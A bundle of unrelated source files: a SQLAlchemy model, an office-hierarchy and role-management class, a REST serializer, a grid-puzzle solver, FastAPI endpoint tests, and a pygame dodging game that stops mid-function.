Column('id_teacher', Integer, ForeignKey('teacher.id', ondelete="CASCADE")),
Column('id_subject', Integer, ForeignKey('subject.id', ondelete="CASCADE")),
UniqueConstraint('id_teacher', 'id_subject', name='unique_teacher_subject')
)
class Teacher(Base):
__tablename__ = 'teacher'
id = Column(Integer, primary_key=True)
first_name = Column(String)
last_name = Column(String)
phone_number = Column(String)
def __init__(self, id, first_name, last_name, phone_number):
self.id = id
self.first_name = first_name
self.last_name = last_name
self.phone_number = phone_number
def __repr__(self):
return "<Teacher(id={}, first_name='{}', last_name='{}', phone_number='{}')>" \
.format(self.id, self.first_name, self.last_name, self.phone_number)
|
# -*- coding: utf-8 -*-
import logging, uuid
from itertools import groupby
class Offices:
def _convertToDict(self,off):
return {'id':off[0],'parent':off[1],'name':off[2],'telephone':off[3],'email':off[4]}
'''
obtiene las oficinas hijas de las oficinas pasadas como parámetro
'''
def _getChildOffices(self,con,offices):
if len(offices) <= 0:
return []
''' obtengo todo el arbol de oficinas abajo de las offices '''
roffices = []
pids = []
pids.extend(offices)
while len(pids) > 0:
toFollow = []
toFollow.extend(pids)
pids = []
for oId in toFollow:
cur = con.cursor()
cur.execute('select id,parent,name,telephone,email from offices.offices where parent = %s',(oId,))
if cur.rowcount <= 0:
continue
for cOff in cur:
cId = cOff[0]
if cId not in pids:
roffices.append({'id':cId,'parent':cOff[1],'name':cOff[2], 'telephone':cOff[3], 'email': cOff[4]})
pids.append(cId)
return roffices
'''
obtiene las oficinas hijas de las oficinas pasadas como parámetro en forma de tree
'''
def _getChildOfficesTree(self,con,office):
cur = con.cursor()
cur.execute('select id,parent,name,telephone,email from offices.offices where parent = %s',(office['id'],))
if cur.rowcount <= 0:
return []
childrens = []
for cOff in cur:
off = self._convertToDict(cOff)
off['childrens'] = self._getChildOfficesTree(con,off)
for child in off['childrens']:
child['childrens'] = self._getChildOfficesTree(con,child)
childrens.append(off)
return childrens
'''
obtiene las oficinas padres de las oficinas pasadas como parametro
'''
def _getParentOffices(self,con,offices):
if len(offices) <= 0:
return []
cur = con.cursor()
cur.execute('select id,parent,name,telephone,email from offices.offices')
if cur.rowcount <= 0:
return []
offrs = cur.fetchall()
data = []
''' agrego las oficinas pasadas como parametro '''
for oid in offices:
for x in offrs:
if x[0] == oid:
data.append(self._convertToDict(x))
break
parents = []
parentsIds = []
for office in data:
pid = office['parent']
while (pid != None) and (pid not in parentsIds):
for parent in offrs:
if parent[0] == pid:
parentsIds.append(pid)
parents.append(self._convertToDict(parent))
pid = parent[1]
break
return parents
'''
obtiene los datos de las oficinas pasadas como parámetro
'''
def _getOfficesData(self,con,officesIds):
if len(offices) <= 0:
return []
cur = con.cursor()
cur.execute('select id,parent,name,telephone,email from offices.offices where id in %s',(tuple(officesIds),))
if cur.rowcount <= 0:
return []
offices = []
for off in cur:
offices.append(self._convertToDict(off))
return offices
'''
Busca una oficina
'''
def findOffice(self,con,id):
cur = con.cursor()
cur.execute('select id,parent,name,telephone,email from offices.offices where id = %s',(id,))
off = cur.fetchone()
if off:
return self._convertToDict(off)
else:
return None
'''
Busca una oficina
'''
def findOffices(self,con,ids):
offices = []
for id in ids:
offices.append(self.findOffice(con,id))
return offices
''' obtiene todas las oficinas '''
def getOffices(self,con):
cur = con.cursor()
cur.execute('select id,parent,name,telephone,email from offices.offices')
offs = cur.fetchall()
offices = []
for off in offs:
offices.append(self._convertToDict(off))
return offices
''' obtiene todas las oficinas en forma de arbol '''
def getOfficesTree(self,con):
offices = self.getOffices(con)
tree = []
# inicializo el childrens de todas las oficinas
for off in offices:
off['childrens'] = []
for off in offices:
parent = None
for off2 in offices:
if off['parent'] == off2['id']:
parent = off2
if parent is None:
tree.append(off)
else:
parent['childrens'].append(off)
return tree
'''
retorna los ids de los usuarios que pertenecen a las oficinas pasasdas como parámetro
offices = lista de ids de oficinas
'''
def getOfficesUsers(self,con,offices):
if len(offices) <= 0:
return []
users = []
cur = con.cursor()
# Obtengo las suboficinas
logging.debug("------------------------")
logging.debug(offices)
logging.debug("------------------------")
child = self._getChildOffices(con,offices)
for o in child:
offices.append(o['id'])
logging.debug(offices)
cur.execute('select distinct user_id from offices.offices_users ou where ou.office_id in %s',(tuple(offices),))
if cur.rowcount <= 0:
return []
for u in cur:
users.append(u[0])
return users
''' obtiene todas las oficinas a las que pertenece un usuario y si tree=True obtiene todas las hijas también '''
def getOfficesByUser(self,con,userId,tree=False,parents=False):
cur = con.cursor()
cur.execute('select id,parent,name,telephone,email from offices.offices o, offices.offices_users ou where ou.user_id = %s and o.id = ou.office_id',(userId,))
if cur.rowcount <= 0:
return []
offices = []
ids = []
for off in cur:
oId = off[0]
ids.append(oId)
offices.append(self._convertToDict(off))
if tree:
offices.extend(self._getChildOffices(con,ids))
if parents:
offices.extend(self._getParentOffices(con,ids))
return offices
''' obtiene todas las oficinas a las que pertenece un usuario en forma de arbol '''
def getOfficesTreeByUser(self,con,userId):
cur = con.cursor()
cur.execute('select id,parent,name,telephone,email from offices.offices o, offices.offices_users ou where ou.user_id = %s and o.id = ou.office_id',(userId,))
if cur.rowcount <= 0:
return []
offices = []
for off in cur:
oId = off[0]
o = self._convertToDict(off)
o['childrens'] = self._getChildOfficesTree(con,o)
if o['childrens'] is None:
o['childrens'] = []
# parent = self.findOffice(con,o['parent'])
# parent['childrens'] = []
offices.append(o)
# offices.append(parent)
removeOffices = []
for off in offices:
for off2 in offices:
if off['parent'] == off2['id']:
removeOffices.append(off)
if 'childrens' not in off2:
off2['childrens'] = []
off2['childrens'].append(off)
break
if 'childrens' not in off2:
continue
for child in off2['childrens']:
if off['parent'] == child['id']:
removeOffices.append(off)
if 'childrens' not in child:
child['childrens'] = []
child['childrens'].append(off)
break
else:
continue
break
offices = [x for x in offices if x not in removeOffices]
return offices
'''
obtiene todos los roles que tiene un usuario dentro de las oficinas
'''
def getOfficesRoles(self,con,userId):
cur = con.cursor()
cur.execute('select user_id,office_id,role from offices.offices_roles ou where ou.user_id = %s',(userId,))
if cur.rowcount <= 0:
return []
roles = []
for r in cur:
roles.append({
'userId':r[0],
'officeId':r[1],
'role':r[2]
})
return roles
'''
obtiene todas las oficinas en las cuales el usuario tiene asignado un rol
si tree=True obtiene todas las hijas también
'''
def getOfficesByUserRole(self,con,userId,tree=False,role='autoriza'):
cur = con.cursor()
cur.execute('select id,parent,name,telephone,email from offices.offices o, offices.offices_roles ou where ou.user_id = %s and o.id = ou.office_id and ou.role = %s',(userId,role))
if cur.rowcount <= 0:
return []
offices = []
ids = []
for off in cur:
oId = off[0]
ids.append(oId)
offices.append({'id':oId,'parent':off[1],'name':off[2],'telephone':off[3],'email':off[4]})
if tree:
childrens = self._getChildOffices(con,ids)
offices.extend(x for x in childrens if x not in offices)
return offices
'''
obtiene todos los ids de los usuarios que pertenecen a las oficinas en las cuales un usuario tiene cierto rol.
'''
def getUserInOfficesByRole(self,con,userId,tree=False,role='autoriza'):
offices = self.getOfficesByUserRole(con,userId,tree,role)
if offices is None or len(offices) <= 0:
return []
officesIds = list(map(lambda x : x['id'],offices))
users = self.getOfficesUsers(con,officesIds)
print(users)
return users
'''
obtiene todos los ids de los usuarios que tienen cierto rol en las oficinas pasadas como parámetro
retorna :
[(userId,sendMail)]
'''
def getUsersWithRoleInOffices(self,con,officesIds,role='autoriza'):
if officesIds is None or len(officesIds) <= 0:
return []
cur = con.cursor()
cur.execute('select user_id,send_mail from offices.offices_roles where office_id in %s and role = %s',(tuple(officesIds),role))
if cur.rowcount <= 0:
return []
users = []
for data in cur:
users.append((data[0],data[1]))
return users
'''
agrega un usuario (userId) a una oficina (officeId)
'''
def addUserToOffices(self,con,officeId,userId):
if officeId is None or userId is None:
return
params = (userId,officeId)
cur = con.cursor()
cur.execute('insert into offices.offices_users (user_id,office_id) values (%s,%s)',params)
'''
Esto hay que verlo bien, es una solucion provisaria
Es para cuando se agrega un usuario y pertenecia al grupo nuevo usuario asistencia
lo elimino del grupo nuevo usuario de asistencia
'''
params = (userId,'45cc065a-7033-4f00-9b19-d7d097129db3')
cur = con.cursor()
cur.execute('delete from offices.offices_users where user_id = %s and office_id = %s',params)
'''
elimina un usuario de una oficina
'''
def removeUser(self,con,officeId,userId):
if officeId is None or userId is None:
return
params = (userId,officeId)
cur = con.cursor()
cur.execute('delete from offices.offices_users where user_id = %s and office_id = %s',params)
'''
Esto hay que verlo bien, es una solucion provisaria
Es para cuando se elimina un usuario y queda sin grupo
lo agrego en el grupo nuevo usuario de asistencia
'''
offices = self.getOfficesByUser(con,userId,False,False)
if offices == None or len(offices) == 0:
params = (userId,'45cc065a-7033-4f00-9b19-d7d097129db3')
cur.execute('insert into offices.offices_users (user_id,office_id) values (%s,%s)',params)
'''
crea una nueva oficina si no existe o sino actualiza los datos
'''
def persist(self,con,office):
if office is None or 'name' not in office:
return
cur = con.cursor()
parent = None
if 'parent' in office:
parent = office['parent']
if parent != None and parent != '' and 'id' in office:
# verifico que el parent no sea uno de sus hijos
childrens = self._getChildOffices(con,[office['id']])
for child in childrens:
if child['id'] == parent:
raise Exception('Error: la oficina padre es al mismo tiempo un hijo')
telephone = None
if 'telephone' in office:
telephone = office['telephone']
email = None
if 'email' in office:
email = office['email']
name = office['name']
params = [parent,name,telephone,email]
if 'id' not in office:
id = str(uuid.uuid4())
params.extend([id])
cur.execute('insert into offices.offices (parent,name,telephone,email,id) values(%s,%s,%s,%s,%s)',params)
else:
id = office['id']
params.extend([id])
cur.execute('update offices.offices set parent = %s, name = %s, telephone = %s, email = %s where id = %s',params)
'''
setea el rol role al usuario userId para la oficina officeId
sendMail es un booleano
'''
def addRole(self,con,userId,officeId,role,sendMail=True):
if userId is None or officeId is None or role is None:
return
params = (userId,officeId,role,sendMail)
cur = con.cursor()
if not(self._includeRole(con,userId,officeId,role)):
cur.execute('insert into offices.offices_roles (user_id,office_id,role,send_mail) values(%s,%s,%s,%s)',params)
'''
verifica si ya existe el rol para user_id en office_id
'''
def _includeRole(self,con,userId,officeId,role):
if userId is None or officeId is None or role is None:
return False
params = (userId,officeId,role)
cur = con.cursor()
cur.execute('select role from offices.offices_roles where user_id = %s and office_id = %s and role = %s',params)
rows = cur.fetchall()
return rows is not None and len(rows) > 0
'''
elimina el rol para usuario oficina
'''
def deleteRole(self,con,userId,officeId,role):
if userId is None or officeId is None or role is None:
return
params = (userId,officeId,role)
cur = con.cursor()
cur.execute('delete from offices.offices_roles where user_id = %s and office_id = %s and role = %s',params)
'''
Obtiene los roles que puede asignar el usuario (userId) para las oficinas (officesId) y usuarios (usersId)
'''
def getRolesAdmin(self, con, userId, officesId, usersId):
if officesId is None or len(officesId) == 0:
return []
'''
Esto es momentaneo, devuelvo los roles de asistencia
Esto hay cambiarlo!!!!!!!
'''
roles = ['autoriza','horas-extras','realizar-solicitud','realizar-solicitud-admin','admin-office','manage-positions']
return roles
'''
Obtiene los roles que esten en 'roles' que estan asignados los usuarios (usersId) para las oficinas (officesId)
'''
def getAssignedRoles(self, con, officesId, usersId, roles):
if (officesId is None or len(officesId) == 0) or (usersId is None or len(usersId) == 0) or (roles is None or len(roles) == 0):
return []
rolesAssigned = []
cur = con.cursor()
cur.execute('select role, office_id, user_id, send_mail from offices.offices_roles where user_id in %s and office_id in %s and role in %s order by role,office_id, send_mail',(tuple(usersId),tuple(officesId),tuple(roles)))
rows = cur.fetchall()
if rows != None:
rolesDict = {}
for row in rows:
if row[0] not in rolesDict:
rolesDict[row[0]] = {'count':0}
role = rolesDict[row[0]]
# seteo el send_mail setSendMail(role,row[3])
self._setSendMail(role,row[3])
# incremento la cantidad de usuarios que se encuentran con dicho rol
role["count"] = role["count"] + 1
print(rolesDict)
for role in rolesDict.keys():
count = rolesDict[role]["count"]
if count == (len(officesId) * len(usersId)):
r = {'name':role,'send_mail':rolesDict[role]["send_mail"]}
rolesAssigned.append(r)
return rolesAssigned
'''
setea el valor de sendMail a role. Predomina False sobre True
v = 't'|'f'
'''
def _setSendMail(self,role,v):
if 'send_mail' not in role or not v:
role['send_mail'] = v
|
from rest_framework import serializers
from camera.models import Camera
class CameraSerializer(serializers.ModelSerializer):
class Meta:
model = Camera
fields = '__all__'
|
from collections import namedtuple
from copy import deepcopy
from hashlib import md5
class Node(object):
def __init__(self, pos, size, used, source=False):
self.pos = pos
self.size = size
self.used = used
self.source = source
def __repr__(self):
contains_data = 'X' if self.source else '0'
return '<(%s,%s) %2sT %2sT %s>' % (
self.pos[0], self.pos[1], self.used, self.size, contains_data
)
@property
def avail(self):
return self.size - self.used
def parse_filesize(size):
return int(size[:-1])
def parse_position(filename):
name = filename.split('/')[-1]
x, y = (int(part[1:]) for part in name.split('-')[1:])
return x, y
def get_grid_size(nodes):
max_x, max_y = 0, 0
for node in nodes:
if node.pos[0] > max_x:
max_x = node.pos[0]
elif node.pos[1] > max_y:
max_y = node.pos[1]
return max_x, max_y
def parse_input(data):
lines = data.split('\n')
nodes = []
for line in lines[2:]: # First two line can be ignored
chunks = line.split()
pos = parse_position(chunks[0])
size, used = (
parse_filesize(chunk) for chunk in chunks[1:3]
)
nodes.append(Node(pos, size, used))
size = get_grid_size(nodes)
nodes = sorted(nodes, key=lambda node: (node.pos[1], node.pos[0] + size[1] * node.pos[1]))
return nodes
def viable_pairs(nodes):
for node_a in nodes:
for node_b in nodes:
if node_a.used > 0 and node_a.used <= node_b.avail:
yield node_a, node_b
def get_node(data, x, y, grid_width):
return data[x + (grid_width + 1) * y]
def available_moves(data, size):
"""Find all the available moves on the data set.
Any viable data swaps that can be performed between two neighbours
is a valid move.
"""
neighbours = ((1, 0), (0, 1), (-1, 0), (0, -1), )
for x in range(size[0] + 1):
for y in range(size[1] + 1):
node = get_node(data, x, y, size[0])
if node.used == 0:
# No data to move, skip it.
continue
for deltas in neighbours:
new_x, new_y = x + deltas[0], y + deltas[1]
if new_x < 0 or new_x > size[0] or new_y < 0 or new_y > size[1]:
# We're out of bounds, skip it.
continue
dest = get_node(data, new_x, new_y, size[0])
if dest.avail >= node.used:
yield (x, y), (new_x, new_y)
def cost(data, grid_width):
for index, node in enumerate(data):
if node.source:
break
x, y = index % (grid_width + 1), index // (grid_width + 1)
# print x, y, index, grid_width, x + y
return x + y
def build_key(data):
"""Build a unique key for a state."""
hasher = md5()
for node in data:
hasher.update(str(node))
return hasher.hexdigest()
def shortest_path(data):
"""Find the shortest path for moving data from (X, 0) to (0, 0).
This isn't as simple as it appears as we may have to perform other
moves in order to clear the path for us to move into. Thus we
perform a breadth first search minimising our cost (distance from
target) and then optimize based on that.
"""
size = get_grid_size(data)
grid_x = size[0]
# Mark our destination node so we can follow it around.
data[grid_x].source = True
paths = [
[data, 0, cost(data, grid_x)],
]
shortest_path_length = None
seen = set()
while True:
new_paths = []
lowest_cost = paths[0][-1]
print '###', len(paths), lowest_cost
for path in paths:
data, steps, data_cost = path
if data_cost > lowest_cost:
# Don't follow just yet. Explore lowest cost items
# first
new_paths.append(path)
continue
for move in available_moves(data, size):
new_data = [deepcopy(n) for n in data]
origin_node = get_node(new_data, move[0][0], move[0][1], grid_x)
dest_node = get_node(new_data, move[1][0], move[1][1], grid_x)
dest_node.used += origin_node.used
origin_node.used = 0
key = build_key(new_data)
if key in seen:
continue
seen.add(key)
if origin_node.source:
dest_node.source = True
origin_node.source = False
if cost(new_data, grid_x) == 0:
print 'FOUND THE SHORTEST PATH', steps
if not shortest_path_length or shortest_path_length > steps:
shortest_path_length = steps
continue
if shortest_path_length and steps >= shortest_path_length:
continue
new_paths.append((new_data, steps + 1, cost(new_data, grid_x)))
paths = new_paths
sorted(paths, key=lambda path: path[-1])
if not paths:
# We've extinguished all possible viable paths, we're done!
break
return shortest_path_length + 1
def test():
test_input = """
Filesystem Size Used Avail Use%
/dev/grid/node-x0-y0 10T 8T 2T 80%
/dev/grid/node-x0-y1 11T 6T 5T 54%
/dev/grid/node-x0-y2 32T 28T 4T 87%
/dev/grid/node-x1-y0 9T 7T 2T 77%
/dev/grid/node-x1-y1 8T 0T 8T 0%
/dev/grid/node-x1-y2 11T 7T 4T 63%
/dev/grid/node-x2-y0 10T 6T 4T 60%
/dev/grid/node-x2-y1 9T 8T 1T 88%
/dev/grid/node-x2-y2 9T 6T 3T 66%"""
data = parse_input(test_input)
assert get_grid_size(data) == (2, 2)
assert shortest_path(data) == 7
def main():
test()
with open('22.txt') as fin:
data = parse_input(fin.read())
print 'The number of viable pairs is %s.' % len(list(viable_pairs(data)))
# 958 is incorrect, too high
# 815 is incorrect, too low
print 'The shortest path is %s.' % shortest_path(data)
if __name__ == '__main__':
main()
|
from fastapi.testclient import TestClient
from unittest import TestCase
from unittest.mock import MagicMock, patch
from requests import Response
from src.server import app
@patch('src.server.Monitoring', autospec=True)
@patch('src.server.FactorialSolver', autospec=True)
@patch('src.server.RedisCache', autospec=True)
@patch('src.server.FibonacciSolver', autospec=True)
class TestFibonacciService(TestCase):
def test_requires_number(self, *args):
with TestClient(app) as client:
response = self._call_fibonacci_service(client, '')
assert response.status_code == 404
def test_accept_zero_number(self, *args):
with TestClient(app) as client:
response = self._call_fibonacci_service(client, str(0))
assert response.status_code == 200
def test_call_computation_fibonacci_with_parameter(self, fibonacci_solver: MagicMock, *args):
n = 10
with TestClient(app) as client:
fibonacci_solver.return_value.solve.return_value = 1
self._call_fibonacci_service(client, str(n))
fibonacci_solver.return_value.solve.assert_called_with(n)
def test_returns_result_computation_fibonacci(self, fibonacci_solver: MagicMock, *args):
result = 11
with TestClient(app) as client:
fibonacci_solver.return_value.solve.return_value = result
response = self._call_fibonacci_service(client, '6')
assert response.json()['result'] == result
def _call_fibonacci_service(self, client, n: str) -> Response:
return client.get(f'/fibonacci/{n}')
@patch('src.server.Monitoring', autospec=True)
@patch('src.server.FibonacciSolver', autospec=True)
@patch('src.server.RedisCache', autospec=True)
@patch('src.server.FactorialSolver', autospec=True)
class TestFactorialService(TestCase):
def test_requires_number(self, *args):
with TestClient(app) as client:
response = self._call_factorial_service(client, '')
assert response.status_code == 404
def test_requires_positive_number(self, *args):
with TestClient(app) as client:
response = self._call_factorial_service(client, str(-10))
assert response.status_code == 422
def test_accept_zero_number(self, *args):
with TestClient(app) as client:
response = self._call_factorial_service(client, str(0))
assert response.status_code == 200
def test_call_computation_factorial_with_parameter(self, factorial_solver: MagicMock, *args):
n = 10
with TestClient(app) as client:
self._call_factorial_service(client, str(n))
factorial_solver.return_value.solve.assert_called_with(n)
def test_returns_result_computation_factorial(self, factorial_solver: MagicMock, *args):
result = 11
with TestClient(app) as client:
factorial_solver.return_value.solve.return_value = result
response = self._call_factorial_service(client, '6')
assert response.json()['result'] == result
def _call_factorial_service(self, client: TestClient, n: str) -> Response:
return client.get(f'/factorial/{n}')
|
import pygame
import random
from os import path
import os
# инициализируем pygame
pygame.init()
# Единственный звуковой эффект в игре, это звук столкновения управляемого шарика со вражеским
# Этот звуковой эффект здесь мы и добавляем
pygame.mixer.init()
snd_dir = path.join(path.dirname('Bump.wav'), 'snd')
boom_snd = pygame.mixer.Sound(path.join(snd_dir, 'Bump.wav'))
# В этом списке будет храниться каждое время, пройденное от левой стены до правой и наоборот
records = []
# Экран
size = width, height = 1000, 500
screen = pygame.display.set_mode(size)
# Время
clock = pygame.time.Clock()
# Это надо для столкновений
all_sprites = pygame.sprite.Group()
horizontal_borders = pygame.sprite.Group()
vertical_borders = pygame.sprite.Group()
Crush = pygame.sprite.Group()
# Параметры нашего шарика
BLUE = (0, 70, 225)
x = 30
y = height // 2
r = 15
# Правда ложь
first = True
kill_them_all = False
wall_1_to_wall_2 = True
wall_2_to_wall_1 = False
menu = True
enemy = False
enemy_go = False
timer_started = True
done = False
play = False
# Цвет букв
font = pygame.font.Font(None, 54)
font_color = pygame.Color('black')
second_color = pygame.Color('blue')
# Прошедшее время
passed_time = 0
# Тоже для секундомера
old_tick = 0
# Для загрузки изображений
def load_image(name, color_key=None):
fullname = os.path.join('img', name)
try:
image = pygame.image.load(fullname)
except pygame.error as message:
print('Cannot load image:', name)
raise SystemExit(message)
if color_key is not None:
if color_key == -1:
color_key = image.get_at((0, 0))
image.set_colorkey(color_key)
else:
image = image.convert_alpha()
return image
# Загрузка изображений
small_image = load_image("small_ball.png")
average_image = load_image("average_ball.png")
big_image = load_image("big_ball.png")
enemy_image = load_image("enemy_ball.png")
# Это класс хитбокса шарика игрока, при его столкновении с красным шариком, игрок отправляется в начало
class Hitbox(pygame.sprite.Sprite):
def __init__(self):
super().__init__(all_sprites)
global x
global y
global r
self.add(Crush)
self.image = pygame.Surface((r, r), pygame.SRCALPHA, 32)
self.rect = pygame.Rect(x, y, r, r)
def update(self, X):
global x
global y
global r
self.rect = pygame.Rect(x, y, r, r)
# Здесь описано поведение красного шарика: в какую сторону он будет лететь изначально и после столкновения с
# поверхностью, а также именно в этом классе прописанно куда отправится игрок после столкновения с красным шариком
class Ball(pygame.sprite.Sprite):
def __init__(self, radius, X, Y):
super().__init__(all_sprites)
self.radius = radius
self.image = pygame.Surface((2 * radius, 2 * radius), pygame.SRCALPHA, 32)
pygame.draw.circle(self.image, pygame.Color("red"), (radius, radius), radius)
self.rect = pygame.Rect(X, Y, 2 * radius, 2 * radius)
self.vx = random.randint(-6, 6)
self.vy = random.randint(-6, 6)
def update(self, X):
global x
global y
self.rect = self.rect.move(self.vx, self.vy)
if pygame.sprite.spritecollideany(self, horizontal_borders):
self.vy = -self.vy
if pygame.sprite.spritecollideany(self, vertical_borders):
self.vx = -self.vx
if pygame.sprite.spritecollideany(self, Crush):
boom_snd.play()
print(x, y)
if wall_1_to_wall_2:
x = 30
y = height // 2
if wall_2_to_wall_1:
x = width - 30
y = height // 2
# Это класс шарика, который следует за тобой
class Following_Ball(pygame.sprite.Sprite):
def __init__(self, radius, X, Y):
super().__init__(all_sprites)
self.radius = radius
self.x = X
self.y = Y
self.radius = radius
self.image = pygame.Surface((2 * self.radius, 2 * self.radius), pygame.SRCALPHA, 32)
pygame.draw.circle(self.image, pygame.Color("black"), (self.radius, self.radius), self.radius)
self.rect = pygame.Rect(self.x, self.y, 2 * self.radius, 2 * self.radius)
self.x = X
self.y = Y
def update(self, X):
global x
global y
global stop
if self.x < x:
self.x += 5
self.rect = self.rect.move(5, 0)
elif self.x > x:
self.x -= 5
self.rect = self.rect.move(-5, 0)
if self.y < y:
self.y += 5
self.rect = self.rect.move(0, 5)
elif self.y > y:
self.y -= 5
self.rect = self.rect.move(0, -5)
if self.x < 60 or self.x > width - 60:
self.x = width // 2
self.y = height // 2
self.rect = pygame.Rect(self.x, self.y, 2 * self.radius, 2 * self.radius)
if pygame.sprite.spritecollideany(self, Crush):
boom_snd.play()
if wall_1_to_wall_2:
x = 30
y = height // 2
if wall_2_to_wall_1:
x = width - 30
y = height // 2
# Класс стен
class Border(pygame.sprite.Sprite):
# строго вертикальный или строго горизонтальный отрезок
def __init__(self, x1, y1, x2, y2):
super().__init__(all_sprites)
if x1 == x2: # вертикальная стенка
self.add(vertical_borders)
self.image = pygame.Surface([1, y2 - y1])
self.rect = pygame.Rect(x1, y1, 1, y2 - y1)
else: # горизонтальная стенка
self.add(horizontal_borders)
self.image = pygame.Surface([x2 - x1, 1])
self.rect = pygame.Rect(x1, y1, x2 - x1, 1)
# Собственно сами стены
Border(5, 0, width - 5, 0)
Border(10, height, width - 5, height)
Border(50, 5, 50, height - 5)
Border(width - 50, 5, width - 50, height - 5)
# Для секундомера
text = font.render(str(passed_time / 1000), True, font_color)
# Хитбокс, снизойди на этот синий шар
Hitbox()
# Задержка перед повторным собитием клавиатуры
pygame.key.set_repeat(25)
# Время со старта
start_time = pygame.time.get_ticks()
keys = pygame.key.get_pressed()
# Флаги для функций меню и основной программы
running = True
run = True
# Кнопка, которая при нажатии запускает игру
class button():
def __init__(self, surf, x, y, width, height):
self.x = x
self.y = y
self.surf = surf # Поверхность для отрисовки
self.width = width
self.height = height
self.counter = 0 # Счетчик нажатий кнопки. Зависит от clock.tick()
def draw(self):
global run
global running
mouse = pygame.mouse.get_pos()
click = pygame.mouse.get_pressed()
if self.x < mouse[0] < self.x + self.width and self.y < mouse[1] < self.y + self.height:
pygame.draw.rect(self.surf, (150, 150, 40), (self.x, self.y, self.width, self.height))
if click[0] == 1:
run = False
running = True
return True
else:
pygame.draw.rect(self.surf, (100, 100, 150), (self.x, self.y, self.width, self.height))
else:
pygame.draw.rect(self.surf, (100, 200, 100), (self.x, self.y, self.width, self.height))
# Просто кнопка
class button2():
def __init__(self, surf, x, y, width, height):
self.x = x
self.y = y
self.surf = surf # Поверхность для отрисовки
self.width = width
self.height = height
self.counter = 0 # Счетчик нажатий кнопки. Зависит от clock.tick()
def draw(self):
global run
mouse = pygame.mouse.get_pos()
click = pygame.mouse.get_pressed()
if self.x < mouse[0] < self.x + self.width and self.y < mouse[1] < self.y + self.height:
pygame.draw.rect(self.surf, (150, 150, 40), (self.x, self.y, self.width, self.height))
if click[0] == 1:
return True
else:
pygame.draw.rect(self.surf, (100, 100, 150), (self.x, self.y, self.width, self.height))
else:
pygame.draw.rect(self.surf, (100, 200, 100), (self.x, self.y, self.width, self.height))
# Меню
def drawMenu():
global r
global enemy
global enemy_go
pygame.init()
pygame.display.set_caption('game')
clock = pygame.time.Clock()
screen.fill(pygame.Color("white"))
startGame = button(screen, 10, 10, 120, 60)
textEasy = font.render('Easy', True, font_color)
screen.blit(textEasy, (10, 70))
startGame2 = button(screen, 330, 10, 120, 60)
textNormal = font.render('Normal', True, font_color)
screen.blit(textNormal, (330, 70))
startGame3 = button(screen, 650, 10, 120, 60)
textHard = font.render('Hard', True, font_color)
screen.blit(textHard, (650, 70))
Ball_size = button2(screen, 10, 300, 120, 60)
textSmall = font.render('Small', True, font_color)
screen.blit(small_image, (100, 300))
screen.blit(textSmall, (10, 380))
Ball_size2 = button2(screen, 330, 300, 120, 60)
textAverage = font.render('Average', True, font_color)
screen.blit(average_image, (430, 290))
screen.blit(textAverage, (330, 380))
Ball_size3 = button2(screen, 650, 300, 120, 60)
textBig = font.render('Big', True, font_color)
screen.blit(big_image, (750, 285))
screen.blit(textBig, (650, 380))
Follow_for_you = button2(screen, 10, 160, 120, 60)
textFollow = font.render('Enemy', True, font_color)
screen.blit(enemy_image, (130, 160))
screen.blit(textFollow, (10, 220))
Not_Follow_for_you = button2(screen, 650, 160, 120, 60)
textNot_follow = font.render('Not enemy', True, font_color)
screen.blit(textNot_follow, (650, 220))
while run:
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
quit()
if startGame.draw():
for i in range(10):
Ball(15, width // 2, 9)
for i in range(10):
Ball(15, width // 2, height - 30)
for i in range(10):
Ball(15, width // 2, height // 2)
if startGame2.draw():
for i in range(20):
Ball(15, width // 2, 9)
for i in range(20):
Ball(15, width // 2, height - 30)
for i in range(20):
Ball(15, width // 2, height // 2)
if startGame3.draw():
for i in range(100):
Ball(15, random.randint(60, 900), random.randint(25, 475))
if Ball_size.draw():
textSmall = font.render('Small', True, second_color)
screen.blit(textSmall, (10, 380))
textBig = font.render('Big', True, font_color)
screen.blit(textBig, (650, 380))
r = 5
Hitbox()
if Ball_size2.draw():
textAverage = font.render('Average', True, second_color)
screen.blit(textAverage, (330, 380))
textSmall = font.render('Small', True, font_color)
screen.blit(textSmall, (10, 380))
textBig = font.render('Big', True, font_color)
screen.blit(textBig, (650, 380))
r = 15
Hitbox()
if Ball_size3.draw():
textBig = font.render('Big', True, second_color)
screen.blit(textBig, (650, 380))
textAverage = font.render('Average', True, font_color)
screen.blit(textAverage, (330, 380))
textSmall = font.render('Small', True, font_color)
screen.blit(textSmall, (10, 380))
r = 25
Hitbox()
if Follow_for_you.draw():
textNot_follow = font.render('Not enemy', True, font_color)
textFollow = font.render('Enemy', True, second_color)
screen.blit(textFollow, (10, 220))
screen.blit(textNot_follow, (650, 220))
enemy_go = True
if Not_Follow_for_you.draw():
textFollow = font.render('Enemy', True, font_color)
textNot_follow = font.render('Not enemy', True, second_color)
screen.blit(textFollow, (10, 220))
screen.blit(textNot_follow, (650, 220))
enemy_go = False
clock.tick(20)
pygame.display.update()
# Заппускаем меню
drawMenu()
if enemy_go:
Following_Ball(10, random.randint(60, 900), random.randint(25, 475))
# Загружаем песню(Да не засудят меня Team meat и Дэнни Барановски)
file = f'{os.path.abspath("snd")}\Forest Funk.mp3'
pygame.mixer.music.load(file)
pygame.mixer.music.play(-1)
# Ставим эту песню на бесконечное повторение
pygame.mixer.music.set_volume(0.2)
# Основной игровой цикл
def game():
global running
global start_time
global passed_time
global x
global y
global wall_1_to_wall_2
global wall_2_to_wall_1
global first
global text
global run
global enemy_go
while running:
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
# Движение мыши заставляет игровые объекты делать лишние действия, поэтому если у нас встречается это
# Событие, мы пропускаем его
if event.type != pygame.MOUSEMOTION:
if timer_started:
# Определяем прошедшее время
passed_time = pygame.time.get_ticks() - start_time
# Белый фон
screen.fill(pygame.Color("white"))
# Рисуем все объекты
all_sprites.draw(screen)
# Управляемый нами шарик здесь отрисовывается отдельно
pygame.draw.circle(screen, BLUE, (x, y), r)
# Нажатия на клавиатуру
keys = pygame.key.get_pressed()
# Содержит в себе координаты шарики перед следующим событием
old_pos = (x, y)
if wall_1_to_wall_2:
if x > 50:
if keys[pygame.K_UP] or keys[pygame.K_DOWN] or keys[pygame.K_LEFT] or keys[pygame.K_RIGHT]:
text = font.render(str(passed_time / 1000), True, font_color)
screen.blit(text, (55, 30))
else:
start_time = pygame.time.get_ticks()
if wall_2_to_wall_1:
if x < width - 50:
if keys[pygame.K_UP] or keys[pygame.K_DOWN] or keys[pygame.K_LEFT] or keys[pygame.K_RIGHT]:
text = font.render(str(passed_time / 1000), True, font_color)
screen.blit(text, (55, 30))
else:
